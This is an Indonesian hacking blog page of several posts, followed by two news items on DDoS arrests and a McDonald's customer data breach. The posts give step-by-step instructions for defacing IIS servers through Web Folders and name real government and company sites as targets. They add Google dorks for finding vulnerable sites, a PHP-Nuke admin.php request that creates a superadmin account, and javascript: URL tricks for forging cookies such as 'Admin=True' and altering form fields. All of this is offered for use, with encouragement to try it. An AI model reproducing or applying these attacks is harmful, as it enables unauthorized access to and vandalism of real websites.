CARA DEFACE WEB 1

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau

merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak

ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu

halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.

Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface

seperti :

http://www.bandaaceh.go.id

http://www.pertamina.co.id

http://www.transtv.co.id

http://www.setkab.go.id

http://www.pom.go.id

http://www.usni.ac.id

Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server

tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp


1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish

8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari

terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.  

READ MORE - CARA DEFACE WEB 1

CARA DEFACE 3 (Old Deface Situs PHP Nuke)

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4.yg berwarna merah gnti dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.sakaw.com/nuke/admin.php?
op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


6.kemudian akan muncul www.sakaw.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=sakaw32 => liat yg diatas tadi
password=anjinkliar => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya 

READ MORE - CARA DEFACE 3 (Old Deface Situs PHP Nuke)

JAVASCRIPT INJECTION

Javascript injection memeang tidak setenar php injection, namun kadang metode ini dibutuhkan. Pada artikel ini akan dibahas sekilas tentang bagaimana melakukan javascript injection secara sederhana.Untuk melakukan javascript injection lebih mudah bila menggunakan browser opera, karena browser ini memiliki fitur-fitur yang lengkap untuk urusan "begini" =P*
Menampilkan dan menulis sebuah cookieKadang kala sebuah website membuat cookie nya dengan javascript, nah untuk melihat cookie tersebut tanpa memanfaatkan fasilitas browser, kita dapat menggunakan perintah ini di url

javascript:alert(document.cookie);perintah`alert(..)`diatas digunakan untuk menampilkan sebuah popup box yang berisi cookie yang ada pada website tersebut.
sedangkan untuk mengganti cookie tersebut, kita dapat menggunakan perintah javascript:void(document.cookie="...");

*cara seperti diatas dapat juga digunakan untuk mengubah atau menampilkan value yang ada di formco.

menampilkan



javascript:alert(document.contoh.pass.value);

mengubah

javascript:void(document.contoh.pass.value="345");

Jika anda menggunakan browser opera, semua ini dapat dilakukan dengan mudah. Cukup tampilkan source dari web tersebut kemudian tuliskan javascript yang ingin anda jalankan pada sesudah tag lalu pilih apply changes.co.

anda ingin mengganti cookie dari suatu web, tulislah pada tag
document.cookie="qwerty";
anda ingin mengganti value dari field pada suatu form seperti contoh di atas
document.contoh.pass.value="345"
anda ingin mengganti referrer
document.referrer=http://qwerty.net;

Setelah di apply changes, maka website target anda telah dalam keadaan menjalankan javascript yang telah anda masukan tadi.

yup, itu sekilas dasar-dasar dari javascript injection. Jika tertarik lebih jauh anda bisa cari-cari referensi dari uncle google..^^ 

READ MORE - JAVASCRIPT INJECTION

JAVASCRIPT INJECTION 2

Javascript injection adalah suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut. Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).

2 perintah yang biasa digunakan untuk Javascript injection adalah alert() dan void(). Contoh, untuk membuat pop-up window, masukkan kode ini ke URL situs:

javascript:alert(‘hello world’);

Tentu, kita bisa masukkan lebih dari 1 perintah di 1 baris. Selain itu, kita bisa menggunakan perintah alert() untuk memunculkan cookie ataupun variabel apapun yang dipakai di situs itu. Contoh:

javascript:alert(document.cookie); alert(variabel);

Hmm, tapi perintah-perintah tersebut hanyalah memunculkan suatu informasi tentang situs tersebut. Bagaimana kalau kita ingin menggantinya? perintah void() akan digunakan untuk ini. Contoh:

javascript:void(variabel=new value);

Struktur perintah untuk mengganti sebuah elemen dari suatu cookie juga hampir sama.

javascript:void(document.cookie=”Field = myValue”);

Perintah ini bisa digunakan untuk membuat Field baru ataupun untuk mengganti sebuah Field sudah ada. Contoh, kalau kita ingin mengganti administration field,

javascript:void(document.cookie=”Admin=True”);

Diatas itu, perintah void() tidak hanya berlaku untuk sebuah elemen saja, kita bisa juga mengganti sebuah form. Misal, kita mempunyai kode seperti:

1.

2. 

3. 

4.     


8.

Dan kita masukkan kode yang berikut

javascript:void(document.forms[0].elements[1].options[1].value=”Aku”);

Maka, yang dilakukannya adalah mengganti form yang pertama (/login.php), elemen yang kedua (select name=”loginID” ) dan pilihan yang kedua (option value=”Dia”)
Dia menjadi “Aku”. Tentu, jumlah perintah yang bisa kita lakukan dengan javascript injection jauh lebih banyak seperti javascript:document.forms[0].DocTitle.value=’ http://www.websiteApaSaja.com’; atau javascript:void(document.forms[0].action=”http://www.google.com”; dan seterusnya.

READ MORE - JAVASCRIPT INJECTION 2

JAVASCRIPT INJECTION 3

Javascript injection adalah teknik kecil yang bagus yang memungkinkan Anda untuk mengubah sebuah isi situs tanpa benar-benar meninggalkan situs. Ini dapat sangat berguna ketika mengatakan, Anda perlu spoof server dengan mengedit beberapa pilihan bentuk. Contoh akan dijelaskan di seluruh.

Isi:
I. Dasar-dasar Injeksi
II. Mengedit Cookie
III. Formulir Mengedit


I. Dasar-dasar Injeksi

suntikan Javascript dijalankan dari baris URL dari halaman yang Anda kunjungi. Untuk menggunakannya, Anda harus terlebih dahulu completly kosong URL dari URL bar. Itu berarti tidak ada http:// atau apapun.

Javascript dijalankan dari URL bar dengan menggunakan javascript: protokol. Dalam tutorial ini saya hanya akan mengajarkan anda tulang telanjang menggunakan ini, tetapi jika Anda seorang guru Javascript, Anda dapat memperluas javascript ini menggunakan tua polos.

Kedua perintah dibahas dalam tutorial ini adalah tanda (), dan void (); perintah. Ini cukup banyak semua yang Anda akan perlu dalam kebanyakan situasi. Untuk javascript pertama Anda, Anda akan membuat jendela sederhana muncul, pertama pergi ke situs web apapun dan kemudian ketik berikut ke URL bar anda:

Kode:

javascript: alert ('Hello, World');

Anda harus mendapatkan kotak dialog kecil yang mengatakan "Hello, World". Ini akan diubah nanti untuk memiliki kegunaan lebih praktis.

Anda juga dapat memiliki lebih dari satu perintah dijalankan pada waktu yang sama:

Kode:

javascript: alert ('Hello'); alert ('Dunia');

Ini akan muncul kotak yang mengatakan 'Halo' dan dari yang lain yang mengatakan 'Dunia'.

II. Mengedit Cookie

Pertama, periksa untuk melihat apakah situs yang anda kunjungi telah mengatur cookie dengan menggunakan script ini:

Kode:

javascript: alert (document.cookie);

Hal ini akan muncul informasi yang disimpan dalam cookie situs. Untuk mengedit informasi apapun, kami memanfaatkan void ();  

perintah.

Kode:

javascript: void (document.cookie = "Field = myValue");

Perintah ini bisa mengubah informasi yang ada atau membuat nilai yang sama sekali baru. Ganti "Field" dengan baik medan yang ada ditemukan dengan menggunakan alert (document.cookie); perintah, atau memasukkan nilai Anda sendiri. Kemudian ganti "myValue" dengan apapun yang Anda inginkan lapangan menjadi. Sebagai contoh:



Kode:

javascript: void (document.cookie = "Authorized = yes");

Apakah baik membuat lapangan "resmi" atau mengeditnya untuk mengatakan "ya" ... sekarang keduanya, atau tidak ini melakukan sesuatu yang berharga tergantung pada situs yang Anda suntik pada.

Hal ini juga berguna untuk memakukan sebuah (document.cookie) waspada, di akhir baris yang sama untuk melihat apa efek Anda mengubah miliki.

III. Formulir Mengedit

Kadang-kadang, untuk mengedit nilai dikirim ke sebuah website yang diberikan melalui formulir, Anda dapat men-download dan 

edit html yang sedikit untuk memungkinkan Anda untuk mengirimkan apa yang Anda inginkan. Namun, kadang-kadang cek website untuk melihat apakah Anda benar-benar dikirim dari situs web Anda seharusnya. Untuk menyiasati ini, kami hanya bisa mengedit bentuk langsung dari javascript. Catatan: Perubahan ini hanya sementara, jadi tidak tgunakan mencoba merusak sebuah situs melalui suntikan javascript seperti ini.

Setiap bentuk pada halaman Web tertentu (kecuali nama lain) disimpan dalam bentuk [x] array ... dimana "x" adalah nomor, agar dari atas ke bawah, dari semua bentuk dalam suatu halaman. Perhatikan bahwa bentuk mulai dari 0, maka bentuk pertama pada halaman benar-benar akan menjadi 0, dan yang kedua akan menjadi 1 dan seterusnya. Mari kita contoh ini:

Kode:

(form action="http://www.website.com/submit.php" method="post")
(input type="hidden" name="to" value="admin@website.com")

Catatan: Karena ini adalah bentuk pertama pada halaman, itu adalah bentuk [0]

Katakanlah formulir ini digunakan untuk email, mengatakan informasi server penting ke admin dari website. Anda tidak dapat hanya men-download naskah dan mengeditnya karena halaman submit.php mencari seorang referer. Anda dapat memeriksa untuk melihat apa nilai elemen bentuk tertentu telah dengan menggunakan script ini:

Kode:

javascript: alert (document.forms [0] to.value.)

Hal ini mirip dengan (document.cookie) alert; dibahas sebelumnya. Dalam hal ini, itu akan muncul peringatan yang mengatakan "admin@website.com"

Jadi di sini adalah cara Inject email Anda ke dalamnya. Anda dapat menggunakan cukup banyak teknik yang sama dengan mengedit cookies yang ditampilkan sebelumnya:

Kode:

javascript: void (document.forms [0] to.value = "email@nhacks.com".)

Hal ini akan mengubah email formulir ini untuk menjadi "email@nhacks.com". Kemudian Anda bisa menggunakan tanda (); script yang ditampilkan di atas untuk memeriksa pekerjaan Anda. Atau Anda dapat pasangan kedua perintah pada satu baris.   

READ MORE - JAVASCRIPT INJECTION 3

Polisi Ringkus Lagi Pendukung WikiLeaks di Belanda

AMSTERDAM - Polisi di Belanda telah menangkap tersangka kedua yang berhubungan dengan gerakan pendukung WikiLeaks. Para tersangka ini diduga melakukan serangan distribution denial of service (DDoS) untuk membuktikan dukungan mereka terhadap situs whistle-blower ini.

Penahanan pemuda berusia 19 tahun ini mengikuti serangan yang dilakukan Kepolisian Belanda beberapa waktu lalu. Sebelumnya ditangkap pula seorang pemuda berusia 16 tahun yang dituduh terlibat dalam kelompok 'Anonymous' pendukung WikiLeaks yang menyerang beberapa website termasuk Mastercard dan PayPal. Demikian dikutip dari Naked Security, Senin (13/12/2010).

Jaksa penuntut mengklaim bahwa pemuda berusia 19 tahun yang berasal dari Hoogezand-Sappemeer, timur laut Belanda, membanjiri website jaksa tersebut dengan trafik internet.

"Pemuda ini menggunakan software hacker untuk membanjiri internet di kantor jaksa dengan sebanyak mungkin trafik digital. Penyelidikan oleh National Police Services Agency menunjukkan bahwa pemuda tersebut menggunakan nama samaran internet Awinee. Mereka juga membujuk pengguna internet lainnya untuk berpartisipasi dalam serangan tersebut," tambah pihak kepolisian

Akan tetapi serangan DDoS yang digunakan tidak menyembunyikan alamat IP di komputernya. Hal ini ternyata membuat polisi jadi lebih mudah mengidentifikasi lokasi di mana serangan tersebut berasal.

Jadi siapakah 'Awinee'? Berdasarkan pencarian Google pengguna nama samaran tersebut berasal dari seorang bernama Martijn Gonlag. Wikipedia mengatakan bahwa ada 34.000 orang yang tinggal di daerah Hoogezand-Sappemeer, lalu mungkin ada banyak pemuda berusia 19 tahun yang menggunakan nama samaran online yang sama.

Serangan distribution denial of service (DDoS) adalah ilegal di banyak negara, dan di Belanda bisa mendapat hukuman penjara selama enam tahun.

Jaksa penuntut juga mengklaim bahwa pria yang baru ditangkap tersebut juga turut berpartisipasi dalam serangan DDos terhadap situs Moneybookers.com, yang membuat situs tersebut offline selama beberapa waktu. Situs Moneybookers.com menghapus hubungannya dengan WikiLeaks pada bulan Agustus.

via okezone

READ MORE - Polisi Ringkus Lagi Pendukung WikiLeaks di Belanda

Peretas Bobol Data Pelanggan McDonald

WASHINGTON - Restoran makanan siap saji McDonald telah melakukan kerja sama dengan pihak penegak hukum, setelah sebelumnya hacker jahat berhasil masuk ke database perusahaan mereka dan mencuri informasi mengenai jumlah pelanggan.

"Kami telah diberitahukan oleh salah satu partner bisnis kita, Arc Worldwide, bahwa informasi pelanggan terbatas yang terkumpul di situs McDonald, diperoleh oleh pihak ketiga yang tidak berwenang," kata juru bicara McDonald, seperti dikutip melalui PC World, Senin (13/12/2010).

Arc disewa oleh McDonald untuk mengembangkan dan mengkoordinir distribusi pesan email promosi, dan Arc pada gilirannya didasarkan pada sebuah perusahaan e-mail tak dikenal untuk mengelola database informasi pelanggan. sistem ini perusahaan e-mail teman yang menyusup ke.

Data yang pelanggan diambil secara sukarela, menurut pihak McDonald, tidak termasuk nomor jaminan sosial, nomor kartu kredit, atau informasi keuangan yang sensitif.

"Sebaliknya, informasi terbatas mencakup apa yang diperlukan untuk mengkonfirmasi seperti usia pelanggan, metode untuk menghubungi pelanggan, preferensi dan informasi umum lainnya," tambah juru bicara.

Ini berarti bahwa data pelanggan akan meliputi nama lengkap, nomor telepon, alamat pos dan alamat email. Juru bicara tidak mengatakan informasi apa yang diperlukan untuk konfirmasi usia, sehingga tidak jelas apakah pelanggan hanya memeriksa orang dewasa.

Selain bekerja sama dengan lembaga penegak hukum, McDonald's adalah menyelidiki kerusakan keamanan di perusahaan yang disewa oleh Arc, yang merupakan divisi layanan pemasaran biro iklan Leo Burnett. spesialisasi Arc meliputi komunikasi digital, pemasaran langsung, promosi dan pemasaran pembelanja.

via okezone

READ MORE - Peretas Bobol Data Pelanggan McDonald